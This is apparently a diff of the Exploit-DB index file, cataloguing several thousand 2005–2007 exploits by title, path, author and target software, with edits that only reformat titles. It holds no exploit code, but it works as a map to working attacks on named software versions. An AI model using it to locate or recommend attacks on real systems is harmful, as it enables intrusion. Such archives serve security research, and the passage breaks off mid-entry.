Explorer - javascript ""window()"" Crash",2005-05-31,"Benjamin Franz",windows,dos,0 +1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - javascript _window()_ Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0 1028,platforms/windows/remote/1028.c,"Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0 1029,platforms/linux/local/1029.c,"ePSXe <= 1.6.0 nogui() Local Exploit",2005-06-04,Qnix,linux,local,0 1030,platforms/php/webapps/1030.pl,"PostNuke <= 0.750 readpmsg.php SQL Injection Exploit",2005-06-05,K-C0d3r,php,webapps,0 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection Exploit",2005-06-06,"Alberto Trivero",php,webapps,0 -1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus ""klif.sys"" Privilege Escalation Vulnerability",2005-06-07,"Ilya Rabinovich",windows,local,0 +1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus _klif.sys_ Privilege Escalation Vulnerability",2005-06-07,"Ilya Rabinovich",windows,local,0 1033,platforms/php/webapps/1033.pl,"WordPress <= 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1034,platforms/windows/local/1034.cpp,"WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 @@ -866,7 +866,7 @@ id,file,description,date,author,platform,type,port 1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard <= 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 -1059,platforms/php/webapps/1059.pl,"WordPress <= 1.5.1.1 - ""add new admin"" SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 +1059,platforms/php/webapps/1059.pl,"WordPress <= 1.5.1.1 - _add new admin_ SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 @@ -884,7 +884,7 @@ id,file,description,date,author,platform,type,port 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 -1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 +1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 - xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 @@ -898,7 +898,7 @@ id,file,description,date,author,platform,type,port 1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0 -1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0 +1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0 1092,platforms/solaris/local/1092.c,"Solaris SPARC / x86 - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 1093,platforms/windows/dos/1093.c,"PrivaShare <= 1.3 - Denial of Service Exploit",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW <= 1.05 - Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 @@ -908,7 +908,7 @@ id,file,description,date,author,platform,type,port 1099,platforms/windows/remote/1099.pl,"Baby Web Server <= 2.6.2 Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer <= 1.0 - Denial of Service Exploit",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service Exploit",2005-07-12,Kozan,windows,dos,0 -1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 - ""Set As Wallpaper"" Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 +1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 - _Set As Wallpaper_ Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 @@ -1214,7 +1214,7 @@ id,file,description,date,author,platform,type,port 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 (Style Changer/Demo Mod) SQL Injection Exploit",2006-02-05,SkOd,php,webapps,0 -1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp ) Buffer Overflow Exploit",2006-02-06,bratax,windows,local,0 +1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit",2006-02-06,bratax,windows,local,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 @@ -1230,14 +1230,14 @@ id,file,description,date,author,platform,type,port 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589 -1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - (.hhp ) Denial of Service",2006-02-10,darkeagle,windows,dos,0 +1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - (.hhp) Denial of Service",2006-02-10,darkeagle,windows,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit",2006-02-10,SkOd,multiple,dos,0 -1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp ) Buffer Overflow Exploit (new)",2006-02-11,k3xji,windows,local,0 +1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (2)",2006-02-11,k3xji,windows,local,0 1491,platforms/php/webapps/1491.php,"DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection Exploit",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS <= 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 -1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - (.hhp ) Buffer Overflow Exploit (3)",2006-02-14,darkeagle,windows,local,0 +1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (3)",2006-02-14,darkeagle,windows,local,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 @@ -1415,7 +1415,7 @@ id,file,description,date,author,platform,type,port 1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability",2006-04-17,botan,php,webapps,0 1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 (Clock Synchronization) Denial of Service Exploit",2006-04-17,"Stefan Lochbihler",windows,dos,0 -1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 +1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 @@ -1858,7 +1858,7 @@ id,file,description,date,author,platform,type,port 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0 -2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0 +2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0 2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0 2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability",2006-08-10,Bl0od3r,php,webapps,0 @@ -1970,7 +1970,7 @@ id,file,description,date,author,platform,type,port 2274,platforms/linux/remote/2274.c,"Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit",2006-08-29,Expanders,linux,remote,0 2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability",2006-08-29,LeAk,php,webapps,0 2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit",2006-08-29,"Francisco Amato",windows,remote,0 -2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2",2006-08-29,psylocn,windows,remote,0 +2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 2280,platforms/php/webapps/2280.pl,"Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit",2006-08-30,Kacper,php,webapps,0 @@ -2064,7 +2064,7 @@ id,file,description,date,author,platform,type,port 2368,platforms/php/webapps/2368.txt,"TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability",2006-09-14,PSYCH@,php,webapps,0 2369,platforms/php/webapps/2369.txt,"PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS <= 1.0.4.2L (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 -2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1- (tr) Remote SQL Injection Vulnerability",2006-09-15,"Fix TR",asp,webapps,0 +2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) Remote SQL Injection Vulnerability",2006-09-15,"Fix TR",asp,webapps,0 2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 @@ -2702,7 +2702,7 @@ id,file,description,date,author,platform,type,port 3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0 -3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0 +3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability",2006-12-28,"the master",php,webapps,0 @@ -2712,8 +2712,8 @@ id,file,description,date,author,platform,type,port 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability",2006-12-29,bd0rk,php,webapps,0 -3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service",2006-12-29,shinnai,windows,dos,0 -3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service",2006-12-29,shinnai,windows,dos,0 +3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 +3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3043,platforms/php/webapps/3043.txt,"x-news 1.1 (users.txt) Remote Password Disclosure Vulnerability",2006-12-30,bd0rk,php,webapps,0 3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b (users.dat) Password Disclosure Vulnerability",2006-12-30,bd0rk,php,webapps,0 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 @@ -2722,7 +2722,7 @@ id,file,description,date,author,platform,type,port 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons <= 2006.01 - (key) Remote SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 -3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 +3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) - Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 @@ -2766,7 +2766,7 @@ id,file,description,date,author,platform,type,port 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta",2007-01-07,"Jacopo Cervini",windows,remote,80 3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0 -3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 Trackback UTF-7 - Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 +3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 - Trackback UTF-7 - Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 @@ -2780,7 +2780,7 @@ id,file,description,date,author,platform,type,port 3106,platforms/php/webapps/3106.txt,"uniForum <= 4 - (wbsearch.aspx) Remote SQL Injection Vulnerability",2007-01-09,ajann,php,webapps,0 3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 -3109,platforms/php/webapps/3109.php,"Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 +3109,platforms/php/webapps/3109.php,"Wordpress <= 2.0.6 - wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 @@ -2824,7 +2824,7 @@ id,file,description,date,author,platform,type,port 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 (grab_globals.lib.php) Remote File Include Vulnerability",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP <= RC3 (2.204) (sql/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs <= 0.70.0 - Local Buffer Overflow Exploit",2007-01-18,prdelka,linux,local,0 -3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service",2007-01-18,shinnai,windows,dos,0 +3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit",2007-01-19,MoAB,osx,local,0 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 @@ -2885,7 +2885,7 @@ id,file,description,date,author,platform,type,port 3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 (phpbb_root_path) Remote File Include Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 3216,platforms/php/webapps/3216.txt,"xNews 1.3 (xNews.php) Remote SQL Injection Vulnerability",2007-01-28,ajann,php,webapps,0 3217,platforms/php/webapps/3217.txt,"PhP Generic library & framework (include_path) RFI Vulnerability",2007-01-28,"Mehmet Ince",php,webapps,0 -3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2",2007-01-28,"Jacopo Cervini",windows,remote,6503 +3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve (msgeng.exe) - Remote Heap Overflow Exploit (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 3219,platforms/osx/local/3219.rb,"Mac OS X 10.4.8 (8L2127) crashdump Privilege Escalation Exploit",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 @@ -2999,7 +2999,7 @@ id,file,description,date,author,platform,type,port 3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 -3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2",2007-02-19,Revenge,linux,local,0 +3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium <= 2.3.0 - Remote SQL Injection Exploit",2007-02-19,ajann,php,webapps,0 3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta)",2007-02-19,"Jacopo Cervini",windows,remote,21 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability",2007-02-20,kezzap66345,php,webapps,0 @@ -3085,7 +3085,7 @@ id,file,description,date,author,platform,type,port 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 -3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 +3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 @@ -3311,7 +3311,7 @@ id,file,description,date,author,platform,type,port 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 -3656,platforms/php/webapps/3656.pl,"Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit",2007-04-03,"Sumit Siddharth",php,webapps,0 +3656,platforms/php/webapps/3656.pl,"Wordpress 2.1.2 - (xmlrpc) Remote SQL Injection Exploit",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach <= 3.0.7 - Remote/Local File Inclusion Vulnerability",2007-04-03,Xst3nZ,php,webapps,0 3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion Vulnerabilities",2007-04-04,kezzap66345,php,webapps,0 @@ -3381,7 +3381,7 @@ id,file,description,date,author,platform,type,port 3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 -3728,platforms/windows/remote/3728.c,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 +3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - 